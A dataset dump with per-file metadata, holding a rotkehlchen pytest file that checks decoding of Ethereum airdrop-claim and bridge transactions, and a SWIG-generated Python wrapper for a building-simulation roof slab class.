| 18.5 | 36 | 0.864865 | 8 | 37 | 3.5 | 0.625 | 0.428571 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.848485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
47a5781e03c481abb1be2b2f1bf522a4d229a694 | 19,881 | py | Python | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 137 | 2018-03-05T11:53:29.000Z | 2019-11-03T16:38:42.000Z | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 385 | 2018-03-08T12:43:41.000Z | 2019-11-10T09:15:36.000Z | rotkehlchen/tests/unit/decoders/test_enriched.py | rotkehlchenio/rotkehlchen | 98f49cd3ed26c641fec03b78eff9fe1872385fbf | [
"BSD-3-Clause"
] | 59 | 2018-03-08T10:08:27.000Z | 2019-10-26T11:30:44.000Z | import pytest
from rotkehlchen.accounting.structures.balance import Balance
from rotkehlchen.accounting.structures.base import (
HistoryBaseEntry,
HistoryEventSubType,
HistoryEventType,
)
from rotkehlchen.assets.asset import EthereumToken
from rotkehlchen.chain.ethereum.decoding.constants import CPT_GAS, CPT_GNOSIS_CHAIN
from rotkehlchen.chain.ethereum.decoding.decoder import EVMTransactionDecoder
from rotkehlchen.chain.ethereum.modules.airdrops.constants import CPT_ONEINCH
from rotkehlchen.chain.ethereum.structures import EthereumTxReceipt, EthereumTxReceiptLog
from rotkehlchen.chain.ethereum.types import string_to_ethereum_address
from rotkehlchen.constants.assets import A_ETH
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.db.ethtx import DBEthTx
from rotkehlchen.fval import FVal
from rotkehlchen.types import EthereumTransaction, Location, deserialize_evm_tx_hash
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.hexbytes import hexstring_to_bytes
@pytest.mark.parametrize('ethereum_accounts', [['0xc931De6d845846E332a52D045072E3feF540Bd5d']]) # noqa: E501
def test_1inch_claim(database, ethereum_manager, eth_transactions):
"""Data for claim taken from
https://etherscan.io/tx/0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0xc931De6d845846E332a52D045072E3feF540Bd5d',
to_address='0xE295aD71242373C37C5FdA7B57F26f9eA1088AFe',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x2e7ba6ef000000000000000000000000000000000000000000000000000000000000c0e5000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d00000000000000000000000000000000000000000000002109156970b0a5f32f00000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000010dbe83b35ea054d18e5fdd804d60b6a528f4b66a227079ecb82febf8eb40919495d102f8922e57278b2b6bb3369ae34c37c378dbd4819126c5e5d371ed4777c4580a9985219f50d16cefc798c2aeb6a4d7fa786f4f38ab27b420e6f3f8e25bd0f45709afe1f9fdec3cbea17d1ec63c6f62ce396524b04c9460bb05ef548239ae050b5330a4228c26b8b25ff021c6cc89ed4f0411ecce80256d090d860f9e6ff5e604076af74bd91959259ff59f8d54455a0edcad41ef1fe230504826f025769c250d89c63241d1dfec9dc4dc75f0a0ec47bcc10594ca7db74335507a5f6e4344b52b129d8e0aaeffe22b7595fa9f11c8e2381feafaf25042407913b9ec34cdf879a05d18a68b7a2506a29ba42fb004c7f32390f986f943a2557e304dc777f73869a046dc08506268e16603452a33ea179b4932eeae59338dd3fee75685cc490f1acba6c0ed0c90792bb6f9f696ad1417efe0032bb0e86b6927234ce419628e24c0d577b40b8956166e4d21cba88b58b32dec0a00b2864e8ed4ac5d7be6683f5f297aaf35d6ca208a954554f4ab14a1ca973daf13e7c1dad49db82611f4dadf2a3c32355753f5e11ba88adc0d27f10ad32ad4904bfd782c15693c6795b047124fccd0f927a7dda89206be7ad613644d02a622c3f30f5de40d052b4c3e10ef02a18107e7a23a7abca2aacc0bf854e247569f822013a86927b10f772b7b13fbc8732'), # noqa: E501
nonce=19,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=297,
data=hexstring_to_bytes('0x00000000000000000000000000000000000000000000002109156970b0a5f32f'), # noqa: E501
address=string_to_ethereum_address('0x111111111117dC0aa78b770fA6A738034120C302'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000e295ad71242373c37c5fda7b57f26f9ea1088afe'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=298,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000000000c0e5000000000000000000000000c931de6d845846e332a52d045072e3fef540bd5d00000000000000000000000000000000000000000000002109156970b0a5f32f'), # noqa: E501
address=string_to_ethereum_address('0xE295aD71242373C37C5FdA7B57F26f9eA1088AFe'),
removed=False,
topics=[
hexstring_to_bytes('0x4ec90e965519d92681267467f775ada5bd214aa92c0dc93d90a5e880ce9ed026'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0xc931De6d845846E332a52D045072E3feF540Bd5d',
notes='Burned 0.00393701451 ETH in gas from 0xc931De6d845846E332a52D045072E3feF540Bd5d', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x0582a0db79de3fa21d3b92a8658e0b1034c51ea54a8e06ea84fbb91d41b8fe17',
sequence_index=298,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.RECEIVE,
event_subtype=HistoryEventSubType.AIRDROP,
asset=EthereumToken('0x111111111117dC0aa78b770fA6A738034120C302'),
balance=Balance(amount=FVal('609.397099685988397871'), usd_value=ZERO),
location_label='0xc931De6d845846E332a52D045072E3feF540Bd5d',
notes='Claim 609.397099685988397871 1INCH from the 1INCH airdrop',
counterparty=CPT_ONEINCH,
),
]
assert events == expected_events
@pytest.mark.parametrize('ethereum_accounts', [['0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4']]) # noqa: E501
def test_gnosis_chain_bridge(database, ethereum_manager, eth_transactions):
"""Data for bridge taken from
https://etherscan.io/tx/0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
to_address='0x88ad09518695c6c3712AC10a214bE5109a655671',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x09c5eabe000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000002e43f7658fd000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000000000000000000000000000000000000000013500050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf6f6a78083ca3e2a662d6dd1703c939c8ace2e268d88ad09518695c6c3712ac10a214be5109a655671000927c00101006401867f7a4d000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000003f615ba21bc6cc5d4a6d798c5950cc5c42937fbd00000000000000000000000000000000000000000000000007392088b40d14000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000004000000000000000000000000006c187e1b71ffbee4429003bb846c1b3eb1610000000000000000000000000000000000000000000000000000048c52ee05b140000000000000000000000000000000000000000000000000000000000000000000000000000000000000105041b1c1c1c73a08c7605fa9c69f068338cb7cd1c8dd21189cbe56f4cc66cff8dc7f0b0c8cc8c64433ea24643b893c9062beae6a05656b1df5643a242533d63925144c3e5c7dfd0509fb3c4232cfdb4c500e942a95b23439b3e18bab4a40057e1bdfae2d9967025b3f8fdca13354b25250c0d7fa9e4b472dc97df1f0cd0f595dc266d09e711628b3a63c1a6e4c83a11d3655891e31901eacf73b927e10bfbe6b0d5ed808cc228d606779a19a7dfb7393956b4fada14eaef8f6de6ee3824e67d6df18cc2d55f00cf869cc920135a94fb4abc213dc43e97812879d9efab046e4fffb931dcb55e5aa2b86f6a848408fea42cd221df99f1720b2ce22830498d78d04e1d083ba12800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'), # noqa: E501
nonce=12,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=473,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000250d51ce33'), # noqa: E501
address=string_to_ethereum_address('0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x00000000000000000000000088ad09518695c6c3712ac10a214be5109a655671'), # noqa: E501
hexstring_to_bytes('0x0000000000000000000000005edcf547ece0ea1765d6c02e9e5bae53b52e09d4'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=474,
data=hexstring_to_bytes('0x000000000000000000000000000000000000000000000000000000250d51ce33'), # noqa: E501
address=string_to_ethereum_address('0x88ad09518695c6c3712AC10a214bE5109a655671'),
removed=False,
topics=[
hexstring_to_bytes('0x9afd47907e25028cdaca89d193518c302bbb128617d5a992c5abd45815526593'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48'), # noqa: E501
hexstring_to_bytes('0x0000000000000000000000005edcf547ece0ea1765d6c02e9e5bae53b52e09d4'), # noqa: E501
hexstring_to_bytes('0x00050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf9'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=6,
data=hexstring_to_bytes('0x0000000000000000000000000000000000000000000000000000000000000001'), # noqa: E501
address=string_to_ethereum_address('0x4c36d2919e407f0cc2ee3c993ccf8ac26d9ce64e'),
removed=False,
topics=[
hexstring_to_bytes('0x27333edb8bdcd40a0ae944fb121b5e2d62ea782683946654a0f5e607a908d578'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000f6a78083ca3e2a662d6dd1703c939c8ace2e268d'), # noqa: E501
hexstring_to_bytes('0x00000000000000000000000088ad09518695c6c3712ac10a214be5109a655671'), # noqa: E501
hexstring_to_bytes('0x00050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf9'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
notes='Burned 0.00393701451 ETH in gas from 0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x52f853d559d83b5303faf044e00e9109bd5c6a05b6633f9df34939f8e7c6de02',
sequence_index=474,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.TRANSFER,
event_subtype=HistoryEventSubType.BRIDGE,
asset=EthereumToken('0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48'),
balance=Balance(amount=FVal('159137.254963'), usd_value=ZERO),
location_label='0x5EDCf547eCE0EA1765D6C02e9E5bae53b52E09D4',
notes='Bridge 159137.254963 USDC from gnosis chain',
counterparty=CPT_GNOSIS_CHAIN,
),
]
assert events == expected_events
@pytest.mark.parametrize('ethereum_accounts', [['0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe']]) # noqa: E501
def test_gitcoin_claim(database, ethereum_manager, eth_transactions):
"""Data for claim taken from
https://etherscan.io/tx/0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
to_address='0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x09c5eabe000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000002e43f7658fd000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000000000000000000000000000000000000000013500050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf6f6a78083ca3e2a662d6dd1703c939c8ace2e268d88ad09518695c6c3712ac10a214be5109a655671000927c00101006401867f7a4d000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000003f615ba21bc6cc5d4a6d798c5950cc5c42937fbd00000000000000000000000000000000000000000000000007392088b40d14000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000004000000000000000000000000006c187e1b71ffbee4429003bb846c1b3eb1610000000000000000000000000000000000000000000000000000048c52ee05b140000000000000000000000000000000000000000000000000000000000000000000000000000000000000105041b1c1c1c73a08c7605fa9c69f068338cb7cd1c8dd21189cbe56f4cc66cff8dc7f0b0c8cc8c64433ea24643b893c9062beae6a05656b1df5643a242533d63925144c3e5c7dfd0509fb3c4232cfdb4c500e942a95b23439b3e18bab4a40057e1bdfae2d9967025b3f8fdca13354b25250c0d7fa9e4b472dc97df1f0cd0f595dc266d09e711628b3a63c1a6e4c83a11d3655891e31901eacf73b927e10bfbe6b0d5ed808cc228d606779a19a7dfb7393956b4fada14eaef8f6de6ee3824e67d6df18cc2d55f00cf869cc920135a94fb4abc213dc43e97812879d9efab046e4fffb931dcb55e5aa2b86f6a848408fea42cd221df99f1720b2ce22830498d78d04e1d083ba12800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'), # noqa: E501
nonce=12,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=473,
data=hexstring_to_bytes('0x00000000000000000000000000000000000000000000000eb9078f7826f80000'), # noqa: E501
address=string_to_ethereum_address('0xDe30da39c46104798bB5aA3fe8B9e0e1F348163F'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000de3e5a990bce7fc60a6f017e7c4a95fc4939299e'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000df5cef8dc0cea8dc200f09280915d1cd7a016bde'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=6,
data=hexstring_to_bytes('0x0000000000000000000000000000000000000000000000000000000000018580000000000000000000000000df5cef8dc0cea8dc200f09280915d1cd7a016bde00000000000000000000000000000000000000000000000eb9078f7826f80000bcfadbb867130fed43327b6c801903ab2afb5134ba5f3d47d2647ab858d5e49e'), # noqa: E501
address=string_to_ethereum_address('0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E'),
removed=False,
topics=[
hexstring_to_bytes('0x04672052dcb6b5b19a9cc2ec1b8f447f1f5e47b5e24cfa5e4ffb640d63ca2be7'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
notes='Burned 0.00393701451 ETH in gas from 0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa',
sequence_index=474,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.RECEIVE,
event_subtype=HistoryEventSubType.AIRDROP,
asset=EthereumToken('0xDe30da39c46104798bB5aA3fe8B9e0e1F348163F'),
balance=Balance(amount=FVal('271.5872'), usd_value=ZERO),
location_label='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
notes='Claim 271.5872 GTC from the GTC airdrop',
counterparty='0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E',
),
]
assert events == expected_events
| 63.721154 | 1,730 | 0.769177 | 1,067 | 19,881 | 14.102156 | 0.169634 | 0.018608 | 0.0319 | 0.015153 | 0.642188 | 0.617133 | 0.579119 | 0.540772 | 0.501163 | 0.492789 | 0 | 0.423565 | 0.179065 | 19,881 | 311 | 1,731 | 63.926045 | 0.498376 | 0.037071 | 0 | 0.684932 | 0 | 0 | 0.46646 | 0.450726 | 0 | 1 | 0.448419 | 0 | 0.020548 | 1 | 0.010274 | false | 0 | 0.054795 | 0 | 0.065068 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
47a88b04392b7ec9e4a8e356b9b82cf9fb219f95 | 15,969 | py | Python | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimSlab_RoofSlab_RoofUnderAir', [dirname(__file__)])
except ImportError:
import _SimSlab_RoofSlab_RoofUnderAir
return _SimSlab_RoofSlab_RoofUnderAir
if fp is not None:
try:
_mod = imp.load_module('_SimSlab_RoofSlab_RoofUnderAir', fp, pathname, description)
finally:
fp.close()
return _mod
_SimSlab_RoofSlab_RoofUnderAir = swig_import_helper()
del swig_import_helper
else:
import _SimSlab_RoofSlab_RoofUnderAir
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import SimSlab_Default_Default
import base
class SimSlab_RoofSlab(SimSlab_Default_Default.SimSlab):
__swig_setmethods__ = {}
for _s in [SimSlab_Default_Default.SimSlab]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab, name, value)
__swig_getmethods__ = {}
for _s in [SimSlab_Default_Default.SimSlab]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab, name)
__repr__ = _swig_repr
def Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_Name(self, *args)
def Representation(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_Representation(self, *args)
def PredefinedSlabType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_PredefinedSlabType(self, *args)
def ConstructionType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConstructionType(self, *args)
def SlabIsExternal(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabIsExternal(self, *args)
def CompositeThermalTrans(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_CompositeThermalTrans(self, *args)
def PhotoVotaicArrayOnElement(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_PhotoVotaicArrayOnElement(self, *args)
def SlabThickness(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabThickness(self, *args)
def SlabPerimeter(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabPerimeter(self, *args)
def SlabGrossArea(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabGrossArea(self, *args)
def SlabNetArea(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabNetArea(self, *args)
def SlabGrossVolume(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabGrossVolume(self, *args)
def SlabNetVolume(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabNetVolume(self, *args)
def ClassRef_UniFormat(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ClassRef_UniFormat(self, *args)
def MaterialLayerSet(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_MaterialLayerSet(self, *args)
def ConnectedSlabs(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedSlabs(self, *args)
def ConnectedWalls(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedWalls(self, *args)
def ConnectedBeams(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedBeams(self, *args)
def ConnectedColumns(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedColumns(self, *args)
def ContainingRamp(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ContainingRamp(self, *args)
def ContainingStair(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ContainingStair(self, *args)
def SimSlab_Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_Name(self, *args)
def SimSlab_ConstructionName(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ConstructionName(self, *args)
def SimSlab_ZoneName(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ZoneName(self, *args)
def SimSlab_OutsdBndCond(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_OutsdBndCond(self, *args)
def SimSlab_OutsdBndCondObject(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_OutsdBndCondObject(self, *args)
def SimSlab_SunExposure(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_SunExposure(self, *args)
def SimSlab_WindExposure(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_WindExposure(self, *args)
def SimSlab_ViewFactToGnd(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ViewFactToGnd(self, *args)
def SimSlab_NumbVerts(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_NumbVerts(self, *args)
def SurfProp_HeatTransAlg_MultSurf_Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_Name(self, *args)
def SurfProp_HeatTransAlg_MultSurf_SurfType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_SurfType(self, *args)
def SurfProp_HeatTransAlg_MultSurf_Algorithm(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_Algorithm(self, *args)
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab__clone(self, f, c)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab
__del__ = lambda self: None
SimSlab_RoofSlab_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_swigregister
SimSlab_RoofSlab_swigregister(SimSlab_RoofSlab)
class SimSlab_RoofSlab_RoofUnderAir(SimSlab_RoofSlab):
__swig_setmethods__ = {}
for _s in [SimSlab_RoofSlab]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab_RoofUnderAir, name, value)
__swig_getmethods__ = {}
for _s in [SimSlab_RoofSlab]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab_RoofUnderAir, name)
